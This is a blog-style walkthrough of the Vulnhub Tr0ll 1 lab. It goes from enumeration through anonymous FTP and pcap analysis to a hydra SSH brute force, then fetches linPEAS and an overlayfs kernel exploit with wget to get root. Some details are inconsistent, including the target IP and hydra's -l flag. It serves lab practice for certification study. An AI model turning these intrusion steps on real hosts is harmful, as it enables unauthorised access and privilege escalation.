Lets start.
You can get the ip of Tr0ll 1 using tool netdiscover
In my case:
Victim (Tr0ll 1 ‘s IP): 192.168.1.65

I am using VMware workstation pro, network connection is set to bridged.

Nmap Scan

nmap -sC -sV -p- 192.168.21.146 -oN vulos2
-sC for default scripts,-sV for version enumeration and -p- to scan all ports and -oN to save the result
In the result we can see services running
Port 21 Ftp
port 22 ssh
port 80 http

Note that we have anonymous FTP login allowed.

we have simple http site when visiting the ip .

Running gobuster reveals the directory /secret

/secret is nothing but a simple troll page.

Running gobuster at /secret reveals nothing.

so our next step would be to use anonymous login to ftp.

password is not required while login.

we can see a file called lol.pcap
lets download this file to our machine

get lol.pcap

Lets analyse the .pcap file using wireshark.

looking at packet 40 we have something interesting.

It is saying we almost found directory sup3rs3cr3tdir
lets visit this directory

there is file named roflmao
click and download this file.

From the file we can see there is address /0x0856BF
lets visit this address, we might find something interesting

we have two folders.

under good_luck folder we have username wordlist.
copy this wordlist and keep it in your machine.

Get dollarboysushil’s stories in your inbox

Join Medium for free to get updates from this writer.

Now the tricky / troll part,

We have Good_job_:) string under this_folder_contains_this_password .
At first i thought this should be the password.
but when i tried brute forcing it didn’t work.

this_folder_contains_this_password if you read the folder name, it is saying this folder contains this password. And this folder contains Pass.txt . So the password is Pass.txt

we now have username list and password>
lets use hydra to brute force username.

hydra -l username.txt -p Pass.txt ssh://192.168.1.65
here -l flag is used to specify the username list.
-p flag is used to specify password string which is Pass.txt
so the username is overflow and password is Pass.txt

lets ssh login with this username and password

we now have shell as user overflow.

Make shell interactive using
python -c ‘import pty; pty.spawn(“/bin/bash”)’

I then looked around files like /etc/passwd , /home etc in a hope to find any thing interesting. aNd found nothing of interest.

Privilege Escalation

for privilege escalation we will use our best friend linpeas (Linux Privilege Escalation Awesome Script ) https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

Move to /tmp directory
download the script wget https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
Make script executable chmod +x linpeas.sh

And comes another troll. Our ssh connection is closed after certain time.
When connection is closed, again login to ssh and download the script.
Once you run the script and get the output we dont need to download the script again .

Looking at the result, we can see machine is vulnerable to various exploit.
Among the exploit I first tried using the dirty cow 2 but g++ was not installed in the machine so i choosed overlafs exploit

copy the download url.

download the exploit using wget url

Rename the exploit from 37292 to 37292.c

compile the exploit.

Then execute the exploit using ./ofc
This should give us a root shell.

now go to root directory using cd /root
Inside the root directory we have proof.txt
Which contains the flag we need to complete this lab.

cat proof.txt
702a8c18d29c6f3ca0d99ef5712bfbdc

Vulnhub: Tr0ll 1 Writeup (OSCP PREP) [by dollarboysushil]

Nmap Scan

Get dollarboysushil’s stories in your inbox

Privilege Escalation